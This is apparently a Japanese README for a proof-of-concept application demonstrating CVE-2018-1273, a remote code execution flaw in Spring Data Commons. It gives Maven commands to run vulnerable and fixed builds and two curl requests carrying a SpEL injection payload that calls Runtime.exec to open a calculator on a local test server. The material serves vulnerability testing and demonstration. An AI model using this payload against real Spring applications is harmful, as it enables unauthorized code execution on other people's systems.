
CVE-2018-1273 の PoC
Spring Data Commons の 1.13 から 1.13.10、2.0 から 2.0.5 より前のバージョン、およびサポート対象外の旧バージョンには、特殊要素の不適切な無害化によって引き起こされるプロパティバインダーの脆弱性が含まれています。未認証のリモートの悪意のあるユーザー(または攻撃者)は、Spring Data REST がバックエンドの HTTP リソースに対して特別に細工されたリクエストパラメータを供給したり、Spring Data の射影ベースのリクエストペイロードバインディングを利用したりすることで、リモートコード実行攻撃につながる可能性があります。
詳細は こちら
このアプリケーションは、脆弱性のあるバージョンまたは修正済みのバージョンの Spring Data Commons でテストできます。
mvn spring-boot:run
mvn spring-boot:run -Dfixed
次のコマンドを実行して、脆弱性が悪用可能かどうかを確認します:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
作成者: https://www.arima.eu
